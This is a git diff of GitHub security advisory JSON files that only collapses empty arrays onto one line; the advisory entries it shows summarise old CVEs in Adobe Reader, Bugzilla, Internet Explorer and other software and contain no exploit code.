b/advisories/unreviewed/2022/05/GHSA-8wcm-px2f-w8qx/GHSA-8wcm-px2f-w8qx.json index 3082220b3ac..96b99c14e74 100644 --- a/advisories/unreviewed/2022/05/GHSA-8wcm-px2f-w8qx/GHSA-8wcm-px2f-w8qx.json +++ b/advisories/unreviewed/2022/05/GHSA-8wcm-px2f-w8qx/GHSA-8wcm-px2f-w8qx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8xfp-c36q-37vr/GHSA-8xfp-c36q-37vr.json b/advisories/unreviewed/2022/05/GHSA-8xfp-c36q-37vr/GHSA-8xfp-c36q-37vr.json index 8f16e6eb119..605215d1f25 100644 --- a/advisories/unreviewed/2022/05/GHSA-8xfp-c36q-37vr/GHSA-8xfp-c36q-37vr.json +++ b/advisories/unreviewed/2022/05/GHSA-8xfp-c36q-37vr/GHSA-8xfp-c36q-37vr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-929m-627q-7654/GHSA-929m-627q-7654.json b/advisories/unreviewed/2022/05/GHSA-929m-627q-7654/GHSA-929m-627q-7654.json index d2e5b240940..24e6123099c 100644 --- a/advisories/unreviewed/2022/05/GHSA-929m-627q-7654/GHSA-929m-627q-7654.json +++ b/advisories/unreviewed/2022/05/GHSA-929m-627q-7654/GHSA-929m-627q-7654.json @@ -7,12 +7,8 @@ "CVE-2011-2379" ], "details": "Cross-site scripting (XSS) vulnerability in Bugzilla 2.4 through 2.22.7, 3.0.x through 3.3.x, 3.4.x before 3.4.12, 3.5.x, 3.6.x before 3.6.6, 3.7.x, 4.0.x before 4.0.2, and 4.1.x before 4.1.3, when Internet Explorer before 9 or Safari before 5.0.6 is used for Raw Unified mode, allows remote attackers to inject arbitrary web script or HTML via a crafted patch, related to content sniffing.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-92cv-78j8-7gg2/GHSA-92cv-78j8-7gg2.json b/advisories/unreviewed/2022/05/GHSA-92cv-78j8-7gg2/GHSA-92cv-78j8-7gg2.json index 5146d977217..4c638337482 100644 --- a/advisories/unreviewed/2022/05/GHSA-92cv-78j8-7gg2/GHSA-92cv-78j8-7gg2.json +++ b/advisories/unreviewed/2022/05/GHSA-92cv-78j8-7gg2/GHSA-92cv-78j8-7gg2.json @@ -7,12 +7,8 @@ "CVE-2015-6713" ], "details": "The Function call implementation in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-93qv-cxhg-7w34/GHSA-93qv-cxhg-7w34.json b/advisories/unreviewed/2022/05/GHSA-93qv-cxhg-7w34/GHSA-93qv-cxhg-7w34.json index 8d9db08955f..619f04baece 100644 --- a/advisories/unreviewed/2022/05/GHSA-93qv-cxhg-7w34/GHSA-93qv-cxhg-7w34.json +++ b/advisories/unreviewed/2022/05/GHSA-93qv-cxhg-7w34/GHSA-93qv-cxhg-7w34.json @@ -7,12 +7,8 @@ "CVE-2012-4845" ], "details": "The FTP client in IBM AIX 6.1 and 7.1, and VIOS 2.2.1.4-FP-25 SP-02, does not properly manage privileges in an RBAC environment, which allows attackers to bypass intended file-read restrictions by leveraging the setuid installation of the ftp executable file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-94rc-fxwq-q3h5/GHSA-94rc-fxwq-q3h5.json b/advisories/unreviewed/2022/05/GHSA-94rc-fxwq-q3h5/GHSA-94rc-fxwq-q3h5.json index d45202b4197..31d0342f593 100644 --- a/advisories/unreviewed/2022/05/GHSA-94rc-fxwq-q3h5/GHSA-94rc-fxwq-q3h5.json +++ b/advisories/unreviewed/2022/05/GHSA-94rc-fxwq-q3h5/GHSA-94rc-fxwq-q3h5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-94wf-332j-3j5q/GHSA-94wf-332j-3j5q.json b/advisories/unreviewed/2022/05/GHSA-94wf-332j-3j5q/GHSA-94wf-332j-3j5q.json index e09caa23073..d93d78f721e 100644 --- a/advisories/unreviewed/2022/05/GHSA-94wf-332j-3j5q/GHSA-94wf-332j-3j5q.json +++ b/advisories/unreviewed/2022/05/GHSA-94wf-332j-3j5q/GHSA-94wf-332j-3j5q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-96r3-2685-3jhv/GHSA-96r3-2685-3jhv.json b/advisories/unreviewed/2022/05/GHSA-96r3-2685-3jhv/GHSA-96r3-2685-3jhv.json index 293ed5a5d10..0862220ac39 100644 --- a/advisories/unreviewed/2022/05/GHSA-96r3-2685-3jhv/GHSA-96r3-2685-3jhv.json +++ b/advisories/unreviewed/2022/05/GHSA-96r3-2685-3jhv/GHSA-96r3-2685-3jhv.json @@ -7,12 +7,8 @@ "CVE-2015-1210" ], "details": "The V8ThrowException::createDOMException function in bindings/core/v8/V8ThrowException.cpp in the V8 bindings in Blink, as used in Google Chrome before 40.0.2214.111 on Windows, OS X, and Linux and before 40.0.2214.109 on Android, does not properly consider frame access restrictions during the throwing of an exception, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -80,9 +76,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-975p-rgfg-49qp/GHSA-975p-rgfg-49qp.json b/advisories/unreviewed/2022/05/GHSA-975p-rgfg-49qp/GHSA-975p-rgfg-49qp.json index 2fa2c38059c..880aaf8756f 100644 --- a/advisories/unreviewed/2022/05/GHSA-975p-rgfg-49qp/GHSA-975p-rgfg-49qp.json +++ b/advisories/unreviewed/2022/05/GHSA-975p-rgfg-49qp/GHSA-975p-rgfg-49qp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-97vp-h7v5-7hcw/GHSA-97vp-h7v5-7hcw.json b/advisories/unreviewed/2022/05/GHSA-97vp-h7v5-7hcw/GHSA-97vp-h7v5-7hcw.json index ef9417f37f7..69b0c1f69e0 100644 --- a/advisories/unreviewed/2022/05/GHSA-97vp-h7v5-7hcw/GHSA-97vp-h7v5-7hcw.json +++ b/advisories/unreviewed/2022/05/GHSA-97vp-h7v5-7hcw/GHSA-97vp-h7v5-7hcw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9fm7-248m-m6p5/GHSA-9fm7-248m-m6p5.json b/advisories/unreviewed/2022/05/GHSA-9fm7-248m-m6p5/GHSA-9fm7-248m-m6p5.json index 615158076e4..959b9ca597c 100644 --- a/advisories/unreviewed/2022/05/GHSA-9fm7-248m-m6p5/GHSA-9fm7-248m-m6p5.json +++ b/advisories/unreviewed/2022/05/GHSA-9fm7-248m-m6p5/GHSA-9fm7-248m-m6p5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9h2g-39vw-rxcp/GHSA-9h2g-39vw-rxcp.json b/advisories/unreviewed/2022/05/GHSA-9h2g-39vw-rxcp/GHSA-9h2g-39vw-rxcp.json index 56150d11553..dd46072fb1c 100644 --- a/advisories/unreviewed/2022/05/GHSA-9h2g-39vw-rxcp/GHSA-9h2g-39vw-rxcp.json +++ b/advisories/unreviewed/2022/05/GHSA-9h2g-39vw-rxcp/GHSA-9h2g-39vw-rxcp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9j63-6xgg-vpx7/GHSA-9j63-6xgg-vpx7.json b/advisories/unreviewed/2022/05/GHSA-9j63-6xgg-vpx7/GHSA-9j63-6xgg-vpx7.json index dab0cba0308..4f6cd346c70 100644 --- a/advisories/unreviewed/2022/05/GHSA-9j63-6xgg-vpx7/GHSA-9j63-6xgg-vpx7.json +++ b/advisories/unreviewed/2022/05/GHSA-9j63-6xgg-vpx7/GHSA-9j63-6xgg-vpx7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9j8m-7rpr-659f/GHSA-9j8m-7rpr-659f.json b/advisories/unreviewed/2022/05/GHSA-9j8m-7rpr-659f/GHSA-9j8m-7rpr-659f.json index e6ee7b7fa9a..cf18fa4061b 100644 --- a/advisories/unreviewed/2022/05/GHSA-9j8m-7rpr-659f/GHSA-9j8m-7rpr-659f.json +++ b/advisories/unreviewed/2022/05/GHSA-9j8m-7rpr-659f/GHSA-9j8m-7rpr-659f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9jcg-6rp8-r9jr/GHSA-9jcg-6rp8-r9jr.json b/advisories/unreviewed/2022/05/GHSA-9jcg-6rp8-r9jr/GHSA-9jcg-6rp8-r9jr.json index 41dd6a82a9d..82f3ecc3dc6 100644 --- a/advisories/unreviewed/2022/05/GHSA-9jcg-6rp8-r9jr/GHSA-9jcg-6rp8-r9jr.json +++ b/advisories/unreviewed/2022/05/GHSA-9jcg-6rp8-r9jr/GHSA-9jcg-6rp8-r9jr.json @@ -7,12 +7,8 @@ "CVE-2015-5092" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors, a different vulnerability than CVE-2014-8450, CVE-2015-4449, CVE-2015-4450, CVE-2015-5088, and CVE-2015-5089.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9jfm-99hc-m6hx/GHSA-9jfm-99hc-m6hx.json b/advisories/unreviewed/2022/05/GHSA-9jfm-99hc-m6hx/GHSA-9jfm-99hc-m6hx.json index 7f330e5e242..1b341390345 100644 --- a/advisories/unreviewed/2022/05/GHSA-9jfm-99hc-m6hx/GHSA-9jfm-99hc-m6hx.json +++ b/advisories/unreviewed/2022/05/GHSA-9jfm-99hc-m6hx/GHSA-9jfm-99hc-m6hx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9mjh-fjw4-45p5/GHSA-9mjh-fjw4-45p5.json b/advisories/unreviewed/2022/05/GHSA-9mjh-fjw4-45p5/GHSA-9mjh-fjw4-45p5.json index 513e6f28caf..37348139e78 100644 --- a/advisories/unreviewed/2022/05/GHSA-9mjh-fjw4-45p5/GHSA-9mjh-fjw4-45p5.json +++ b/advisories/unreviewed/2022/05/GHSA-9mjh-fjw4-45p5/GHSA-9mjh-fjw4-45p5.json @@ -7,12 +7,8 @@ "CVE-2015-6696" ], "details": "Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-6698.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9pg3-r76h-43mh/GHSA-9pg3-r76h-43mh.json b/advisories/unreviewed/2022/05/GHSA-9pg3-r76h-43mh/GHSA-9pg3-r76h-43mh.json index 61bb94963d4..256adcfcb37 100644 --- a/advisories/unreviewed/2022/05/GHSA-9pg3-r76h-43mh/GHSA-9pg3-r76h-43mh.json +++ b/advisories/unreviewed/2022/05/GHSA-9pg3-r76h-43mh/GHSA-9pg3-r76h-43mh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9q37-frcq-v33g/GHSA-9q37-frcq-v33g.json b/advisories/unreviewed/2022/05/GHSA-9q37-frcq-v33g/GHSA-9q37-frcq-v33g.json index 9bf2b137699..40e41449886 100644 --- a/advisories/unreviewed/2022/05/GHSA-9q37-frcq-v33g/GHSA-9q37-frcq-v33g.json +++ b/advisories/unreviewed/2022/05/GHSA-9q37-frcq-v33g/GHSA-9q37-frcq-v33g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9q5h-jvgh-x2h7/GHSA-9q5h-jvgh-x2h7.json b/advisories/unreviewed/2022/05/GHSA-9q5h-jvgh-x2h7/GHSA-9q5h-jvgh-x2h7.json index 40b8de0e094..eb6ddf5d0c6 100644 --- a/advisories/unreviewed/2022/05/GHSA-9q5h-jvgh-x2h7/GHSA-9q5h-jvgh-x2h7.json +++ b/advisories/unreviewed/2022/05/GHSA-9q5h-jvgh-x2h7/GHSA-9q5h-jvgh-x2h7.json @@ -7,12 +7,8 @@ "CVE-2011-2383" ], "details": "Microsoft Internet Explorer 9 and earlier does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing an http: URL that redirects to a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue, aka \"Drag and Drop Information Disclosure Vulnerability.\" NOTE: this vulnerability exists because of an incomplete fix in the Internet Explorer 9 release.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9x49-3286-rqfp/GHSA-9x49-3286-rqfp.json b/advisories/unreviewed/2022/05/GHSA-9x49-3286-rqfp/GHSA-9x49-3286-rqfp.json index 65a71165cfc..159c907bffe 100644 --- a/advisories/unreviewed/2022/05/GHSA-9x49-3286-rqfp/GHSA-9x49-3286-rqfp.json +++ b/advisories/unreviewed/2022/05/GHSA-9x49-3286-rqfp/GHSA-9x49-3286-rqfp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9xj4-8jr9-rf9f/GHSA-9xj4-8jr9-rf9f.json b/advisories/unreviewed/2022/05/GHSA-9xj4-8jr9-rf9f/GHSA-9xj4-8jr9-rf9f.json index d4d91cee073..e46caae049d 100644 --- a/advisories/unreviewed/2022/05/GHSA-9xj4-8jr9-rf9f/GHSA-9xj4-8jr9-rf9f.json +++ b/advisories/unreviewed/2022/05/GHSA-9xj4-8jr9-rf9f/GHSA-9xj4-8jr9-rf9f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c3cx-8mvg-g7xg/GHSA-c3cx-8mvg-g7xg.json b/advisories/unreviewed/2022/05/GHSA-c3cx-8mvg-g7xg/GHSA-c3cx-8mvg-g7xg.json index 2410b354c2b..06f8a2a5f5e 100644 --- a/advisories/unreviewed/2022/05/GHSA-c3cx-8mvg-g7xg/GHSA-c3cx-8mvg-g7xg.json +++ b/advisories/unreviewed/2022/05/GHSA-c3cx-8mvg-g7xg/GHSA-c3cx-8mvg-g7xg.json @@ -7,12 +7,8 @@ "CVE-2015-4435" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-4438, CVE-2015-4441, CVE-2015-4445, CVE-2015-4447, CVE-2015-4451, CVE-2015-4452, CVE-2015-5085, and CVE-2015-5086.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-c6hg-x56f-2f88/GHSA-c6hg-x56f-2f88.json b/advisories/unreviewed/2022/05/GHSA-c6hg-x56f-2f88/GHSA-c6hg-x56f-2f88.json index d433c33efa8..7c0f5e3037d 100644 --- a/advisories/unreviewed/2022/05/GHSA-c6hg-x56f-2f88/GHSA-c6hg-x56f-2f88.json +++ b/advisories/unreviewed/2022/05/GHSA-c6hg-x56f-2f88/GHSA-c6hg-x56f-2f88.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c75m-655v-9rxc/GHSA-c75m-655v-9rxc.json b/advisories/unreviewed/2022/05/GHSA-c75m-655v-9rxc/GHSA-c75m-655v-9rxc.json index 4028b48ffcb..faf6e543b09 100644 --- a/advisories/unreviewed/2022/05/GHSA-c75m-655v-9rxc/GHSA-c75m-655v-9rxc.json +++ b/advisories/unreviewed/2022/05/GHSA-c75m-655v-9rxc/GHSA-c75m-655v-9rxc.json @@ -7,12 +7,8 @@ "CVE-2012-2421" ], "details": "Absolute path traversal vulnerability in the intu-help-qb (aka Intuit Help System Async Pluggable Protocol) handlers in HelpAsyncPluggableProtocol.dll in Intuit QuickBooks 2009 through 2012, when Internet Explorer is used, might allow remote attackers to read arbitrary files in ZIP archives via a full pathname in the URI.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c77h-2f4c-x8q8/GHSA-c77h-2f4c-x8q8.json b/advisories/unreviewed/2022/05/GHSA-c77h-2f4c-x8q8/GHSA-c77h-2f4c-x8q8.json index b85c9931b22..125d49f7562 100644 --- a/advisories/unreviewed/2022/05/GHSA-c77h-2f4c-x8q8/GHSA-c77h-2f4c-x8q8.json +++ b/advisories/unreviewed/2022/05/GHSA-c77h-2f4c-x8q8/GHSA-c77h-2f4c-x8q8.json @@ -7,12 +7,8 @@ "CVE-2015-6688" ], "details": "Use-after-free vulnerability in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to execute arbitrary code via a crafted Optional Content Groups (OCG) object in a WillSave document action, a different vulnerability than CVE-2015-5586, CVE-2015-6683, CVE-2015-6684, CVE-2015-6687, CVE-2015-6689, CVE-2015-6690, CVE-2015-6691, CVE-2015-7615, CVE-2015-7617, and CVE-2015-7621.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c7vr-vpgw-x48r/GHSA-c7vr-vpgw-x48r.json b/advisories/unreviewed/2022/05/GHSA-c7vr-vpgw-x48r/GHSA-c7vr-vpgw-x48r.json index 177950af0e7..ee3029695c8 100644 --- a/advisories/unreviewed/2022/05/GHSA-c7vr-vpgw-x48r/GHSA-c7vr-vpgw-x48r.json +++ b/advisories/unreviewed/2022/05/GHSA-c7vr-vpgw-x48r/GHSA-c7vr-vpgw-x48r.json @@ -7,12 +7,8 @@ "CVE-2015-6692" ], "details": "Buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to obtain sensitive information via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c7vw-5hm7-6vqc/GHSA-c7vw-5hm7-6vqc.json b/advisories/unreviewed/2022/05/GHSA-c7vw-5hm7-6vqc/GHSA-c7vw-5hm7-6vqc.json index 7c0b7ff1bdd..202c65b88b8 100644 --- a/advisories/unreviewed/2022/05/GHSA-c7vw-5hm7-6vqc/GHSA-c7vw-5hm7-6vqc.json +++ b/advisories/unreviewed/2022/05/GHSA-c7vw-5hm7-6vqc/GHSA-c7vw-5hm7-6vqc.json @@ -7,12 +7,8 @@ "CVE-2015-5089" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors, a different vulnerability than CVE-2014-8450, CVE-2015-4449, CVE-2015-4450, CVE-2015-5088, and CVE-2015-5092.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c8px-2q5w-fhjm/GHSA-c8px-2q5w-fhjm.json b/advisories/unreviewed/2022/05/GHSA-c8px-2q5w-fhjm/GHSA-c8px-2q5w-fhjm.json index dde1cb30e46..475136a885c 100644 --- a/advisories/unreviewed/2022/05/GHSA-c8px-2q5w-fhjm/GHSA-c8px-2q5w-fhjm.json +++ b/advisories/unreviewed/2022/05/GHSA-c8px-2q5w-fhjm/GHSA-c8px-2q5w-fhjm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cc87-h9q3-w659/GHSA-cc87-h9q3-w659.json b/advisories/unreviewed/2022/05/GHSA-cc87-h9q3-w659/GHSA-cc87-h9q3-w659.json index f2b483a5722..76d0dc3c701 100644 --- a/advisories/unreviewed/2022/05/GHSA-cc87-h9q3-w659/GHSA-cc87-h9q3-w659.json +++ b/advisories/unreviewed/2022/05/GHSA-cc87-h9q3-w659/GHSA-cc87-h9q3-w659.json @@ -7,12 +7,8 @@ "CVE-2014-0566" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0565.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cf58-jjq5-73mm/GHSA-cf58-jjq5-73mm.json b/advisories/unreviewed/2022/05/GHSA-cf58-jjq5-73mm/GHSA-cf58-jjq5-73mm.json index bd8b0f0c97c..3cea72fd2fc 100644 --- a/advisories/unreviewed/2022/05/GHSA-cf58-jjq5-73mm/GHSA-cf58-jjq5-73mm.json +++ b/advisories/unreviewed/2022/05/GHSA-cf58-jjq5-73mm/GHSA-cf58-jjq5-73mm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cfh6-j4mw-8cx7/GHSA-cfh6-j4mw-8cx7.json b/advisories/unreviewed/2022/05/GHSA-cfh6-j4mw-8cx7/GHSA-cfh6-j4mw-8cx7.json index b10c548f29d..8e37548f4be 100644 --- a/advisories/unreviewed/2022/05/GHSA-cfh6-j4mw-8cx7/GHSA-cfh6-j4mw-8cx7.json +++ b/advisories/unreviewed/2022/05/GHSA-cfh6-j4mw-8cx7/GHSA-cfh6-j4mw-8cx7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cg48-596p-vf3x/GHSA-cg48-596p-vf3x.json b/advisories/unreviewed/2022/05/GHSA-cg48-596p-vf3x/GHSA-cg48-596p-vf3x.json index 431ea115a97..a2042e5381c 100644 --- a/advisories/unreviewed/2022/05/GHSA-cg48-596p-vf3x/GHSA-cg48-596p-vf3x.json +++ b/advisories/unreviewed/2022/05/GHSA-cg48-596p-vf3x/GHSA-cg48-596p-vf3x.json @@ -7,12 +7,8 @@ "CVE-2012-1248" ], "details": "app/config/core.php in baserCMS 1.6.15 and earlier does not properly handle installations in shared-hosting environments, which allows remote attackers to hijack sessions by leveraging administrative access to a different domain.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cgvh-2fm7-9964/GHSA-cgvh-2fm7-9964.json b/advisories/unreviewed/2022/05/GHSA-cgvh-2fm7-9964/GHSA-cgvh-2fm7-9964.json index ce7d11ce9d7..ad622bce30d 100644 --- a/advisories/unreviewed/2022/05/GHSA-cgvh-2fm7-9964/GHSA-cgvh-2fm7-9964.json +++ b/advisories/unreviewed/2022/05/GHSA-cgvh-2fm7-9964/GHSA-cgvh-2fm7-9964.json @@ -7,12 +7,8 @@ "CVE-2015-6718" ], "details": "The CBSharedReviewIfOfflineDialog method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, 